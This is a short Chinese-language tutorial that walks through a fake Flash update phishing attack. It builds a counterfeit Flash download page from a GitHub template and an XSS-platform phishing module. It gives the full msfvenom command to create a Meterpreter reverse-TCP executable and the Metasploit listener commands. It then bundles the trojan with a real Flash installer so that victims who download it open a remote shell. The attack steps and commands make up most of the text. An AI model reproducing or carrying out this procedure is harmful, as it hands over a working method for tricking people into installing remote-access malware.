一、在本机下载PHPstudy
二、将flash源码文件部署在网址根目录下 网址:https://github.com/crow821/crowsec/tree/master/crowsec_FakeFlash(选择多的哪个)如下图
三、在xss平台上的公共模块点击flash窗口钓鱼的源码并保存到一个js文件放在根目录下
四、将1.js中的代码修改为伪造网站的网址
新建一个1.hmtl 输入如下代码
五、在kali中执行如下代码生成木🐎
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > shell.exe
生成一个shell.exe
执行一下命令开启监听:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 自己ip
set lport 4444
run
六、将生成的shell.exe 和 flashcenter_pp_ax_install_cn.exe 压缩一个压缩包(关闭防火墙 病毒实时检测)
改名
如下操作
之后点击确定压缩
七、在第一步下载的文件中打开index.html将下载文件改为我们的flash.exe
8.访问物理机http://ip/i.html
跳转到我们伪装的flash官网页面
点击下载会下载我们的exe文件
运行报毒(我们自己的不怕)继续运行
运行成功后会出现flash的安装界面
查看kali 发现有目标上线